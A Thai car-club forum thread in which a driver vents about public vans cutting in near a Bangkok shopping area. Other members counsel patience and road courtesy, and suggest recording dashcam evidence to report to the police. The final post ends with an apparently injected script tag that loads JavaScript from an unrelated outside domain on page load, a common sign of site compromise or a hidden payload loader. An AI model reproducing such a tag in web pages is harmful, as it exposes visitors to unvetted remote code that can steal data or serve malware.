ตอบ
lay.te.7

เข้าร่วม: 11 กุมภา 2015
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 0
พุธ, 11 กุมภา 2015 09:49 - เจอรถตู้เหี้ยๆ
แถวพันทิพงามวงวาน เวลารถตู้มันจอดทำไมมันต้องปาดหักหัวรถแบบทีเดียวเข้าจอดได้เลย พอจะออกแมร่งกะออกแบบ 90องศา เพื่อจะขึ้นสะพาน เดียวนี้เข้าๆแมร่งเบรคไม่ค่อยจะอยู่เจอแมร่งทิ่มมาแบบนี้ ต้องทำไงครับ ตำรวจแมร่งกะพึ่งไรไม่ได้ คือถ้าไม่ล้มจนโดนเหยียบ ตำรวจคงไม่ทำอะไร  หรือรอวันเหลืออด แล้วทุบรถแมร่งทิ้งเลย  พวกรถสาธารณะ แมร่งขับรถแบบแล้งน้ำใจชิบหาย
ได้รับคำขอบคุณจาก: mome_moji  qq 
wasan_ceo

ชื่อเล่น: โจ้

เข้าร่วม: 29 กันยา 2013
ตอบ: 573

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 589
ให้คำขอบคุณ: 93

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 11 กุมภา 2015 11:25 - เจอรถตู้เหี้ยๆ
ใจเย็นๆนะครับ และอ่านที่ผมจะบรรยายต่อไปนี้ดู อย่างแรกเลยเราต้องทำความเข้าใจก่อนว่าเราเป็ฯรถเล็ก
ซึ่งมีความคล่องตัวสูงซ้ายขวา ซอกซอย ไปได้หมด ทีนี้รถใหญ่ อย่างรถตู้ และโดยเฉพาะรถตู้สาธารณะ
ซึ่งต้องหากินโดยการทำเวลา + รับส่งผู้โดยสาร ไปพร้อมๆกันนั้น จึงต้องมีการ ปาด ขวาง แทรก เกิดขึ้น
โดยเฉพาะ จุดจอด ป้ายรถใหญ่ๆ หน้าห้าง ต่างๆ ในลักษณะแบบนี้ คนที่เข้าขับรถเป็นอาชีพ เขาจะรู้และ
เข้าใจซึ่งกันและกันแม้จะแข่งกันรับผู้โดยสารแต่ถ้อยทีถ้อยอาศัยกัน ในการเข้าออก ทีนี้ คุณควรต้องรู้
ว่าในที่ที่มีการจราจรหนาแน่นขวักไขว่ อย่างหน้าห้าง หน้าป้าย ทางร่วม ทางแยก หรือ บางป้าย มีทางขึ้นลง
สะพาน มันมีความเสี่ยงต่อการเข้ารับส่งผู้โดยสารของรถสาธารณะ ซึ่งเราก็ไม่ควรใช้ความเร็วในจุดเสี่ยงแบบนี้ 

และในทางกลับกัน ถ้าคุณได้ขับรถใหญ่หรือ 4 ล้อขึ้นไปคุณจะรู้ว่า มอไซด์มันก็.....เหมือนกัน ไม่สนใจรถ
คันอื่น คิดแต่ว่ากูจะไป อย่างถ้าคุณถอดรถออกมาก แล้วมีมอไซด์ขี่มา คุณอย่าหวังว่ามอไซด์จะหยุดให้คุณถอย
ถ้าคุณไม่เบรก และยังถอยต่อไป มันก็จะชลอแล้วเบี่ยงไปเลนสวนทันที ทั้งที่รถในเลนสวน จอดรถเพื่อให้คุณ
ถอยรถออกก่อน พอจะนึกออกไหมครับ การใช้ถนนร่วมกันต้องใช้น้ำใจร่วมด้วย ไม่ว่าคุณจะขับรถใหญ่หรือ
เล็ก การให้ทางเป็ฯน้ำใจอย่างยิ่งบนถนน ลองนึกภาพ ผู้หญิงหรือคนชราที่ขับรถไม่คล่องนัก ถอยรถในทางแคบ
รถเยอะ หรือจะเลี้ยวซ้าย แต่อยู่ผิดเลน จอดนิ่ง ได้แต่หักพวงมาลัยรอเลี้ยวอยู่ ท่ามกลางไฟเขียว รอแค่ใครสักคน
จะจอดให้ แล้วถ้าคุณอยู่เลนซ้าย คุณจะเบรคให้ไหม หรือคุณจะตบแตรใส่แล้วด่าพ่อล่อแม่เขา

ใช้รถใช้ถนนร่วมกัน ใช้น้ำใจร่วมกัน คุณลองจอดให้ทางใครสักคน ที่กำลังจะเลี้ยว กำลังจะถอย กำลังจะออก
คุณจะรู้สึกอิ่มใจเหมือนได้ตักบาตรเลย และถ้ามีใครให้ทางคุณก็อย่าลืมลดกระจก ยกมือให้เป็นการขอบคุณ
แม้แต่รถคันอื่นที่มองดู การจอดให้ทาง และ ยกมือ ขอบคุณ ยังปลื้มเลย ผมจะบอกให้ 
kkanakornkum

ชื่อเล่น: เค

เข้าร่วม: 04 มกรา 2014
ตอบ: 495

ได้รับคำขอบคุณ: 275
ให้คำขอบคุณ: 37

ปี: 2002
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 11 กุมภา 2015 12:19 - เจอรถตู้เหี้ยๆ
เยี่ยมครับ พี่โจ้ 5 หลา
ได้รับคำขอบคุณจาก: mome_moji  wasan_ceo  karnmotocross01 
pukzone

เข้าร่วม: 11 ตุลา 2011
ตอบ: 721

Guru ES
Guru ES

ได้รับคำขอบคุณ: 708
ให้คำขอบคุณ: 184

ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 11 กุมภา 2015 13:00 - เจอรถตู้เหี้ยๆ
..
ได้รับคำขอบคุณจาก: karnmotocross01 
surasaka

เข้าร่วม: 02 สิงหา 2011
ตอบ: 722

Guru ES
Guru ES

ได้รับคำขอบคุณ: 551
ให้คำขอบคุณ: 3511
พุธ, 11 กุมภา 2015 13:45 - เจอรถตู้เหี้ยๆ
wasan_ceo พิมพ์ว่า:
ใจเย็นๆนะครับ และอ่านที่ผมจะบรรยายต่อไปนี้ดู อย่างแรกเลยเราต้องทำความเข้าใจก่อนว่าเราเป็ฯรถเล็ก
ซึ่งมีความคล่องตัวสูงซ้ายขวา ซอกซอย ไปได้หมด ทีนี้รถใหญ่ อย่างรถตู้ และโดยเฉพาะรถตู้สาธารณะ
ซึ่งต้องหากินโดยการทำเวลา + รับส่งผู้โดยสาร ไปพร้อมๆกันนั้น จึงต้องมีการ ปาด ขวาง แทรก เกิดขึ้น
โดยเฉพาะ จุดจอด ป้ายรถใหญ่ๆ หน้าห้าง ต่างๆ ในลักษณะแบบนี้ คนที่เข้าขับรถเป็นอาชีพ เขาจะรู้และ
เข้าใจซึ่งกันและกันแม้จะแข่งกันรับผู้โดยสารแต่ถ้อยทีถ้อยอาศัยกัน ในการเข้าออก ทีนี้ คุณควรต้องรู้
ว่าในที่ที่มีการจราจรหนาแน่นขวักไขว่ อย่างหน้าห้าง หน้าป้าย ทางร่วม ทางแยก หรือ บางป้าย มีทางขึ้นลง
สะพาน มันมีความเสี่ยงต่อการเข้ารับส่งผู้โดยสารของรถสาธารณะ ซึ่งเราก็ไม่ควรใช้ความเร็วในจุดเสี่ยงแบบนี้ 

และในทางกลับกัน ถ้าคุณได้ขับรถใหญ่หรือ 4 ล้อขึ้นไปคุณจะรู้ว่า มอไซด์มันก็.....เหมือนกัน ไม่สนใจรถ
คันอื่น คิดแต่ว่ากูจะไป อย่างถ้าคุณถอดรถออกมาก แล้วมีมอไซด์ขี่มา คุณอย่าหวังว่ามอไซด์จะหยุดให้คุณถอย
ถ้าคุณไม่เบรก และยังถอยต่อไป มันก็จะชลอแล้วเบี่ยงไปเลนสวนทันที ทั้งที่รถในเลนสวน จอดรถเพื่อให้คุณ
ถอยรถออกก่อน พอจะนึกออกไหมครับ การใช้ถนนร่วมกันต้องใช้น้ำใจร่วมด้วย ไม่ว่าคุณจะขับรถใหญ่หรือ
เล็ก การให้ทางเป็ฯน้ำใจอย่างยิ่งบนถนน ลองนึกภาพ ผู้หญิงหรือคนชราที่ขับรถไม่คล่องนัก ถอยรถในทางแคบ
รถเยอะ หรือจะเลี้ยวซ้าย แต่อยู่ผิดเลน จอดนิ่ง ได้แต่หักพวงมาลัยรอเลี้ยวอยู่ ท่ามกลางไฟเขียว รอแค่ใครสักคน
จะจอดให้ แล้วถ้าคุณอยู่เลนซ้าย คุณจะเบรคให้ไหม หรือคุณจะตบแตรใส่แล้วด่าพ่อล่อแม่เขา

ใช้รถใช้ถนนร่วมกัน ใช้น้ำใจร่วมกัน คุณลองจอดให้ทางใครสักคน ที่กำลังจะเลี้ยว กำลังจะถอย กำลังจะออก
คุณจะรู้สึกอิ่มใจเหมือนได้ตักบาตรเลย และถ้ามีใครให้ทางคุณก็อย่าลืมลดกระจก ยกมือให้เป็นการขอบคุณ
แม้แต่รถคันอื่นที่มองดู การจอดให้ทาง และ ยกมือ ขอบคุณ ยังปลื้มเลย ผมจะบอกให้ 

เห็นด้วยอย่างยิ่งครับ...
ได้รับคำขอบคุณจาก: mome_moji  wasan_ceo  karnmotocross01 
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 11 กุมภา 2015 18:13 - เจอรถตู้เหี้ยๆ

เห็นด้วยครับ เกิดเราไปทำลายรถเค้าเราก็ไม่มีอะไรดีขึ้น ยิ่งจะทำให้เรามีคดีความอีก ปล่อยวาง ทำใจร่มๆ ครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 11 กุมภา 2015 19:04 - เจอรถตู้เหี้ยๆ
พวกนี้ ทำจนชิน ได้ใจ ไม่มีใครไปทำอะไร ก็เหลิง ไม่สนใจคนอื่น
ผมขอยืนยันว่า รถ บนท้องถนน ทุกคัน ต้องทำตามกฏจราจร กฏจราจร มีไว้เพื่อความปลอดภัยเป็นหลัก
การที่รถตู้ ขับปาดหน้ากระชั้นชิด ออกขวา 90 องศาเพื่้อขึ้นสะพาน ไม่ถูกต้องครับ
และเราไม่ควรยอมให้คนพวกนี้ ทำแบบนี้ต่อไปด้วย แต่ เราก็ต้องทำตามกฏหมายครับ
ถ้ามีกล้อง บันทึก แชร์ลงบน Social network และเก็บเป็นหลักฐาน แจ้งตำรวจได้ครับ ที่ตำรวจเขาไม่ทำอะไร เพราะไม่มีหลักฐาน มันทำอะไรเขาไม่ได้ เขาจึงไม่อยากเสียเวลา

ช่วยๆ กันให้ การขับขี่ เป็นไปอย่างปลอดภัย และมีความสุข 
ใครทำผิดกฏ ต้องช่วยกันเป็นหูเป็นตา จัดการ ให้เหลือน้อย หรือหมดไปเลย
ได้รับคำขอบคุณจาก: karnmotocross01  boymac  jjcivic  sayhi.ray  fasang.Mr 
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 11 กุมภา 2015 20:13 - เจอรถตู้เหี้ยๆ
เสริมนิดครับ คือมอไซค์เวลาจะหยุดกระทันหันมันไม่ง่ายเท่าไรครับบนถนนที่มีแต่น้ำหยดเต็มไปหมด มันต้องทรงตัวและไม่ให้แถไปเลนข้างเคียง นั่นหมายถึงอาจโดนชนหรือโดนทับได้ครับ. ฝั่งนึงเสียเวลาไม่ว่าถูกหรือผิด อีกฝั่งบาดเจ็บหรือถึงตายไม่ว่าจะถูกหรือผิด น่าเห็นใจนะครับ. ผมใช้ทั้งสองอย่าง ขับรถใหญ่ก็ด่ามอไซค์บ้างขับรถเล็กก็ด่ารถใหญ่บ้าง(ไม่ให้เค้าได้ยินน่ะ) แต่ยกเว้นes ทุกกรณี ทางที่ดีใจเย็นครับเดี๋ยวนี้คนโหดๆทั้งนั้น !!
konmaisumkan.wave

ชื่อเล่น: เวฟเองครัช

เข้าร่วม: 17 เมษา 2014
ตอบ: 156

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 77

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 12 กุมภา 2015 10:13 - เจอรถตู้เหี้ยๆ

jjcivic

ชื่อเล่น: โก้

เข้าร่วม: 16 ธันวา 2009
ตอบ: 432

ได้รับคำขอบคุณ: 699
ให้คำขอบคุณ: 259

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 17 กุมภา 2015 08:05 - เจอรถตู้เหี้ยๆ
Pantamitr พิมพ์ว่า:
พวกนี้ ทำจนชิน ได้ใจ ไม่มีใครไปทำอะไร ก็เหลิง ไม่สนใจคนอื่น
ผมขอยืนยันว่า รถ บนท้องถนน ทุกคัน ต้องทำตามกฏจราจร กฏจราจร มีไว้เพื่อความปลอดภัยเป็นหลัก
การที่รถตู้ ขับปาดหน้ากระชั้นชิด ออกขวา 90 องศาเพื่้อขึ้นสะพาน ไม่ถูกต้องครับ
และเราไม่ควรยอมให้คนพวกนี้ ทำแบบนี้ต่อไปด้วย แต่ เราก็ต้องทำตามกฏหมายครับ
ถ้ามีกล้อง บันทึก แชร์ลงบน Social network และเก็บเป็นหลักฐาน แจ้งตำรวจได้ครับ ที่ตำรวจเขาไม่ทำอะไร เพราะไม่มีหลักฐาน มันทำอะไรเขาไม่ได้ เขาจึงไม่อยากเสียเวลา

ช่วยๆ กันให้ การขับขี่ เป็นไปอย่างปลอดภัย และมีความสุข 
ใครทำผิดกฏ ต้องช่วยกันเป็นหูเป็นตา จัดการ ให้เหลือน้อย หรือหมดไปเลย

Khachi

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
อังคาร, 17 กุมภา 2015 16:32 - เจอรถตู้เหี้ยๆ
No Comment  บรึ้นๆ  เป็นผมคงแบ่งๆกันไป อยากไปนักก็ปล่อยไปก่อน ลูกกับเมียรออยู่ที่บ้าน  "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.